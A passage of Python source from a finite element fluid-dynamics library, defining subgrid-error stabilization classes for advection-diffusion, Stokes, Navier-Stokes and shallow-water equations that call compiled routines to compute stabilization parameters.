oldTau=False#True #mwf oldTau not working with sd!
for ci in range(self.nc):
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_tau_sd(self.stabilizationFlag,
self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('dH',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('dH',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('dH',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
q[('dmt',ci,ci)],
q[('dH',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[ci]
else:
tau=self.tau[ci]
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
class HamiltonJacobi_ASGS_opt(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.cq=cq
self.mesh=mesh
self.tau=[]
self.tau_last=[]
for ci in range(self.nc):
if self.lag:
cq[('dH_sge',ci,ci)]=copy.deepcopy(cq[('dH',ci,ci)])
else:
cq[('dH_sge',ci,ci)]=cq[('dH',ci,ci)]
def calculateSubgridError(self,q):
pass
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.cq[('dH_sge',ci,ci)][:]= self.cq[('dH',ci,ci)]
class StokesStabilization_1(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
def calculateSubgridError(self,q):
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes2D_1_sd(self.mesh.elementDiametersArray,
q[('u',1)],
q[('u',2)],
q[('a',1,1)],
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
else:
csubgridError.calculateSubgridErrorStokes2D_1(self.mesh.elementDiametersArray,
q[('u',1)],
q[('u',2)],
q[('a',1,1)],
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
def updateSubgridErrorHistory(self,initializationPhase=False):
pass
class StokesASGS_velocity(SGE_base):
def __init__(self,coefficients,nd):
SGE_base.__init__(self,coefficients,nd,lag=False)
self.stabilizationFlag = '1'
coefficients.stencil[0].add(0)
if nd == 2:
coefficients.stencil[1].add(2)
coefficients.stencil[2].add(1)
elif nd == 3:
coefficients.stencil[1].add(2)
coefficients.stencil[1].add(3)
coefficients.stencil[2].add(1)
coefficients.stencil[2].add(3)
coefficients.stencil[3].add(1)
coefficients.stencil[3].add(2)
def calculateSubgridError(self,q):
if self.nd == 2:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes2D_GLS_velocity_sd(self.mesh.elementDiametersArray,
q[('a',1,1)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)])
else:
csubgridError.calculateSubgridErrorStokes2D_GLS_velocity(self.mesh.elementDiametersArray,
q[('a',1,1)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)])
elif self.nd == 3:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes3D_GLS_velocity_sd(self.mesh.elementDiametersArray,
q[('a',1,1)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,3)])
else:
csubgridError.calculateSubgridErrorStokes3D_GLS_velocity(self.mesh.elementDiametersArray,
q[('a',1,1)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,3)])
#mwf debug
#import pdb
#pdb.set_trace()
def updateSubgridErrorHistory(self,initializationPhase=False):
pass
class NavierStokesASGS_velocity_pressure(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=5,hFactor=1.0,noPressureStabilization=False):
self.noPressureStabilization=noPressureStabilization
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
coefficients.stencil[0].add(0)
self.nSteps=0
self.delayLagSteps=delayLagSteps
self.hFactor=hFactor
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
self.v_last = copy.deepcopy(cq[('f',0)])
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for cj in range(self.nc):
if cq.has_key(('df',ci,cj)):
if ci ==0:
cq[('df_sge',ci,cj)]=cq[('df',ci,cj)]
else:
#cek for incompressible form weshould just be able to use v_last
#cq[('df_sge',ci,cj)] = numpy.zeros(cq[('df',ci,cj)].shape,'d')
if ci == cj:
cq[('df_sge',ci,cj)] = self.v_last
else:
cq[('df_sge',ci,cj)] = numpy.zeros(cq[('df',ci,cj)].shape,'d')
else:
for cj in range(self.nc):
if cq.has_key(('df',ci,cj)):
cq[('df_sge',ci,cj)]=cq[('df',ci,cj)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=cq[('grad(phi)',ck)]
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=cq[('dphi',ck,cj)]
cq[('da_sge',ci,ck,cj)]=cq[('da',ci,ck,cj)]
for ci,cjDict in self.coefficients.hamiltonian.iteritems():
for cj in cjDict:
cq[('dH_sge',ci,cj)]=cq[('dH',ci,cj)]
if self.lag:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
cq[('dmt',1,1)],
cq[('dm',1,1)],
cq[('f',0)],
cq[('a',1,1)],
self.tau[0],
self.tau[1],
cq[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
cq[('dmt',1,1)],
cq[('dm',1,1)],
cq[('f',0)],
cq[('a',1,1)],
self.tau[0],
self.tau[1],
cq[('cfl',0)])
self.v_last[:]=self.cq[('f',0)]
def updateSubgridErrorHistory(self,initializationPhase=False):
self.nSteps+=1
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
self.v_last[:]=self.cq[('f',0)]
#cek for incompressible form we can just use v_last
# for cj in range(self.nc):
# if self.cq.has_key(('df',ci,cj)):
# if ci != 0:
# self.cq[('df_sge',ci,cj)][:] = self.cq[('df',ci,cj)]
def calculateSubgridError(self,q):
import LinearAlgebraTools
oldTau=True
if self.nd == 2:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
elif self.nd == 3:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
csubgridError.calculateSubgridErrorNavierStokes3D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('dpdeResidual',0,3)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('dpdeResidual',1,3)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('dpdeResidual',2,3)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,1)],
q[('dpdeResidual',3,2)],
q[('dpdeResidual',3,3)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('dsubgridError',0,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('dsubgridError',1,3)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)],
q[('dsubgridError',2,3)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,1)],
q[('dsubgridError',3,2)],
q[('dsubgridError',3,3)])
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
q[('dsubgridError',0,3)][:]=0.0
for ci in range(self.nd):
q[('cfl',ci+1)][:] = q[('cfl',0)]
class NavierStokesASGS_velocity_pressure_opt(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=5,hFactor=1.0,noPressureStabilization=False):
self.noPressureStabilization=noPressureStabilization
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
coefficients.stencil[0].add(0)
self.nSteps=0
self.delayLagSteps=delayLagSteps
self.hFactor=hFactor
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
if self.lag:
self.v_last = self.cq[('velocity',0)]
else:
self.v_last = cq[('f',0)]
cq[('df_sge',1,1)]=self.v_last
cq[('df_sge',2,2)]=self.v_last
cq[('df_sge',3,3)]=self.v_last
def updateSubgridErrorHistory(self,initializationPhase=False):
self.nSteps+=1
def calculateSubgridError(self,q):
if self.nSteps < self.delayLagSteps:
self.v_last = q[('f',0)]
cq[('df_sge',1,1)]=q[('f',0)]
cq[('df_sge',2,2)]=q[('f',0)]
cq[('df_sge',3,3)]=q[('f',0)]
else:
self.v_last = q[('velocity',0)]
cq[('df_sge',1,1)]=q[('velocity',0)]
cq[('df_sge',2,2)]=q[('velocity',0)]
cq[('df_sge',3,3)]=q[('velocity',0)]
class NavierStokesASGS_velocity_pressure_optV2(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=0,hFactor=1.0,noPressureStabilization=False):
self.noPressureStabilization=noPressureStabilization
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
coefficients.stencil[0].add(0)
self.nSteps=0
self.delayLagSteps=delayLagSteps
self.hFactor=hFactor
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
if self.lag:
self.v_last = copy.deepcopy(self.cq[('velocity',0)])
else:
self.v_last = self.cq[('velocity',0)]
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
self.v_last[:] = self.cq[('velocity',0)]
def calculateSubgridError(self,q):
pass
class NavierStokesWithBodyForceASGS_velocity_pressure(NavierStokesASGS_velocity_pressure):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=5,hFactor=1.0,noPressureStabilization=False):
NavierStokesASGS_velocity_pressure.__init__(self,coefficients,nd,stabFlag=stabFlag,lag=lag,
delayLagSteps=delayLagSteps,hFactor=hFactor,noPressureStabilization=noPressureStabilization)
def initializeElementQuadrature(self,mesh,t,cq):
NavierStokesASGS_velocity_pressure.initializeElementQuadrature(self,mesh,t,cq)
self.q_dmt_r = numpy.zeros(cq[('dmt',1,1)].shape,'d')
def calculateSubgridError(self,q):
import LinearAlgebraTools
oldTau=True
self.q_dmt_r.flat[:] = q[('dmt',1,1)].flat
self.q_dmt_r += q[('dr',1,1)]
if self.nd == 2:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
elif self.nd == 3:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
csubgridError.calculateSubgridErrorNavierStokes3D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('dpdeResidual',0,3)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('dpdeResidual',1,3)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('dpdeResidual',2,3)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,1)],
q[('dpdeResidual',3,2)],
q[('dpdeResidual',3,3)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('dsubgridError',0,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('dsubgridError',1,3)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)],
q[('dsubgridError',2,3)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,1)],
q[('dsubgridError',3,2)],
q[('dsubgridError',3,3)])
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
q[('dsubgridError',0,3)][:]=0.0
for ci in range(self.nd):
q[('cfl',ci+1)][:] = q[('cfl',0)]
#mwf orig
# if self.nd == 2:
# if self.coefficients.sd:
# csubgridError.calculateSubgridErrorNavierStokes2D_generic_withBodyForce_tau_sd(q['inverse(J)'],
# q[('dmt',1,1)],
# q[('dm',1,1)],
# q[('df',1,1)],
# q[('a',1,1)],
# q[('dr',1,1)],
# self.tau[0],
# self.tau[1],
# q[('cfl',0)])
# else:
# csubgridError.calculateSubgridErrorNavierStokes2D_generic_withBodyForce_tau(q['inverse(J)'],
# q[('dmt',1,1)],
# q[('dm',1,1)],
# q[('df',1,1)],
# q[('a',1,1)],
# q[('dr',1,1)],
# self.tau[0],
# self.tau[1],
# q[('cfl',0)])
# if self.lag:#TODO: make sure up to date with delaySteps flag
# tau0=self.tau_last[0]
# tau1=self.tau_last[1]
# else:
# tau0=self.tau[0]
# tau1=self.tau[1]
# csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tauRes(tau0,
# tau1,
# q[('pdeResidual',0)],
# q[('dpdeResidual',0,1)],
# q[('dpdeResidual',0,2)],
# q[('pdeResidual',1)],
# q[('dpdeResidual',1,0)],
# q[('dpdeResidual',1,1)],
# q[('pdeResidual',2)],
# q[('dpdeResidual',2,0)],
# q[('dpdeResidual',2,2)],
# q[('subgridError',0)],
# q[('dsubgridError',0,1)],
# q[('dsubgridError',0,2)],
# q[('subgridError',1)],
# q[('dsubgridError',1,0)],
# q[('dsubgridError',1,1)],
# q[('subgridError',2)],
# q[('dsubgridError',2,0)],
# q[('dsubgridError',2,2)])
# elif self.nd == 3:
# return NavierStokesASGS_velocity_pressure.calculateSubgridError(q)
class StokesASGS_velocity_pressure(SGE_base):
def __init__(self,coefficients,nd):
SGE_base.__init__(self,coefficients,nd,lag=False)
coefficients.stencil[0].add(0)
if nd == 2:
coefficients.stencil[1].add(2)
coefficients.stencil[2].add(1)
elif nd == 3:
coefficients.stencil[1].add(2)
coefficients.stencil[1].add(3)
coefficients.stencil[2].add(1)
coefficients.stencil[2].add(3)
coefficients.stencil[3].add(1)
coefficients.stencil[3].add(3)
def calculateSubgridError(self,q):
if self.nd == 2:
# import pdb
# pdb.set_trace()
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes_GLS_tau_sd(self.mesh.elementDiametersArray,
q[('dH',1,0)],
q[('a',1,1)],
self.tau[0],
self.tau[1])
else:
csubgridError.calculateSubgridErrorStokes_GLS_tau(self.mesh.elementDiametersArray,
q[('dH',1,0)],
q[('a',1,1)],
self.tau[0],
self.tau[1])
csubgridError.calculateSubgridErrorStokes2D_GLS_tauRes(self.tau[0],
self.tau[1],
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)])
elif self.nd == 3:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes_GLS_tau_sd(self.mesh.elementDiametersArray,
q[('dH',1,0)],
q[('a',1,1)],
self.tau[0],
self.tau[1])
else:
csubgridError.calculateSubgridErrorStokes_GLS_tau(self.mesh.elementDiametersArray,
q[('dH',1,0)],
q[('a',1,1)],
self.tau[0],
self.tau[1])
self.tau[0][:] = 0.0
csubgridError.calculateSubgridErrorStokes3D_GLS_tauRes(self.tau[0],
self.tau[1],
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('dpdeResidual',0,3)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,3)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('dsubgridError',0,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,3)])
class TwophaseStokes_LS_FC_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
self.nc = coefficients.nc
self.nd = nd
self.components=range(self.nc)
self.lag=lag
self.stabilizationFlag = stabFlag
coefficients.stencil[0].add(0)
def initializeElementQuadrature(self,mesh,t,cq):
self.mesh=mesh
self.tau=[]
self.tau_last=[]
if self.lag:
self.tau_last = numpy.zeros(cq[('u',0)].shape,'d')
self.tau = numpy.zeros(cq[('u',0)].shape,'d')
else:
self.tau = numpy.zeros(cq[('u',0)].shape,'d')
def calculateSubgridError(self,q):
csubgridError.calculateSubgridError_A_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',0,0)],
q[('df',0,0)],
q[('cfl',0)],
self.tau)
if self.lag:
tau = self.tau_last
else:
tau = self.tau
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',0)],
q[('dpdeResidual',0,0)],
q[('subgridError',0)],
q[('dsubgridError',0,0)])
csubgridError.calculateSubgridErrorStokes2D_GLS_velocity(self.mesh.elementDiametersArray,
q[('a',2,2)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,1)],
q[('dpdeResidual',3,3)],
q[('subgridError',2)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)],
q[('subgridError',3)],
q[('dsubgridError',3,1)],
q[('dsubgridError',3,3)])
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag != None:
self.tau_last[:] = self.tau
class ShallowWater_CFL(SGE_base):
def __init__(self,coefficients,nd,g):
SGE_base.__init__(self,coefficients,nd,lag=False)
self.g=g
self.nc=nd+1
self.nd=nd
def calculateSubgridError(self,q):
if self.nd==1:
csubgridError.calculateSubgridErrorShallowWater1D(self.g,
self.mesh.elementDiametersArray,
q[('u',0)],
q[('u',1)],
q[('cfl',0)],
q[('cfl',1)])
if self.nd==2:
csubgridError.calculateSubgridErrorShallowWater2D(self.g,
self.mesh.elementDiametersArray,
q[('u',0)],
q[('u',1)],
q[('u',2)],
q[('cfl',0)],
q[('cfl',1)],
q[('cfl',2)])
class SkewStabilization_1:
def __init__(self,mesh,nc,nd):
